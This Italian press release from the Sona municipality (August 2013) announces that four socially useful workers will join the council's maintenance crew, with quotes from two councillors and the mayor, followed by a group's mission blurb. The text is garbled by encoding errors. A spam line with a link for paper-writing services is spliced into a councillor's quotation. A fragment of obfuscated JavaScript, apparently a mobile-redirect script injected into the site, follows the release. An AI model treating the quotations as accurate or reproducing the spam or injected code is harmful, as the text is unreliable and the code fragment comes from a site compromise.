Quattro lavoratori socialmente utili daranno il loro aiuto all’amministrazione di Sona.

COMUNICATO STAMPAAi??Ai??

Sona, 30 agosto 2013

Quattro lavoratori socialmente utili daranno il loro aiuto all’amministrazione di Sona.

La nuova amministrazione del Comune di Sona ha deciso, nella riunione di Giunta dell’8 agosto scorso, di fare ufficiale richiesta di quattro lavoratori socialmente utili da inserire nella squadra degli operai del Comune.

Il Comune di Sona li impiegherAi?? nel settore manutenzioni, per un massimo di 20 ore settimanali e per la durata di un anno, eventualmente rinnovabile.Ai?? L’amministrazione non avrAi?? alcun onere economico, tranne quello per un’assicurazione per danni a terzi.

ai???Ho la speranza che si possa agire con piA? incisivitAi?? nelle quotidiane esigenze dei cittadini che ci segnalano continuamente disfunzioni a cui, con solo quattro operai, si fatica a rispondereai???, cosAi?? parla l’assessore alle manutenzioni Gianfranco Dalla Valentina che continua ricordando che ai???l’inizio del nuovo anno scolastico fa in genere aumentare le richieste di opere di manutenzione, ma non smettono mai i bisogni per i piccoli lavori stradali, le buche in primis. La possibilitAi?? dei lavoratori socialmente utili A? stata accolta dall’intera Giunta come una concreta soluzione che darAi?? una mano ai bisogni della cittadinanzaai???.

L’iniziativa A? anche stata fortemente voluta dall’assessore Luigi Forante: ai???Ho insistito molto perchAi?? si desse il via a questo progetto a cui credo moltissimo. paper writers for hire within https://paper-writer.org/. Il mio impegno A? di utilizzare la risorsa dei lavoratori socialmente utili anche in altri settori amministrativi. Osserveremo e vigileremo su questa prima esperienza per ottimizzarla e valorizzarla al massimoai???.

Esprime il suo pieno appoggio anche il sindaco Gianluigi Mazzi: ai???La nostra amministrazione intende servirsi di tutti quegli strumenti e di tutte quelle opportunitAi?? che rendano la nostra azione politica piA? efficiente ed efficace. I cittadini devono sapere che la nostra squadra A? quotidianamente impegnata a cercare soluzioni innovative per realizzare i nostri progetti e migliorare la vita dei nostri cittadini. Non dimentico poi che ci saranno quattro persone che lasceranno la loro difficile condizione d’inattivitAi?? e torneranno a sentirsi utili protagonisti della comunitAi??ai???.

I lavoratori socialmente utili sono selezionati dalle liste di mobilitAi?? e sono impiegati per piccoli ma fondamentali lavori all’interno degli enti pubblici.
)|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){

Comments are closed.

Un nuovo futuro perSona

Ci accomuna un bisogno: quello di creare un nuovo modo di appartenere alla comunità.
Una strada concreta fatta di conoscenza, esperienza e analisi, elementi necessari allo sviluppo di nuove proposte solide e realizzabili.

Ci accomuna un forte senso di appartenenza a questa comunità che ci ha sempre visto coinvolti in prima persona in attività di interesse sociale e politico.
Attività che ci hanno preparato e motivato nel voler tradurre in realtà amministrativa un progetto libero dalle tattiche e dalle strategia di partito.

Ci accomuna l’esperienza e la competenza nei diversi settori stimolo per una nuova amministrazione basata su una programmazione attenta dei bisogni quotidiani ed essenziali dei cittadini; sull’ottimizzazione e la valorizzazione delle risorse e sull’identificazione di un programma di sviluppo del territorio.

Ci accomuna la voglia di fare, di provare a creare un futuro che è nostro e dei nostri figli, senza interessi, ma con lo spirito di servizio tipico del volontariato.

Ci muove la speranza di coinvolgere chi, come noi, ha voglia di rompere gli schemi della vecchia guardia politica e vuole rinnovare Sona e e sue frazioni per davvero.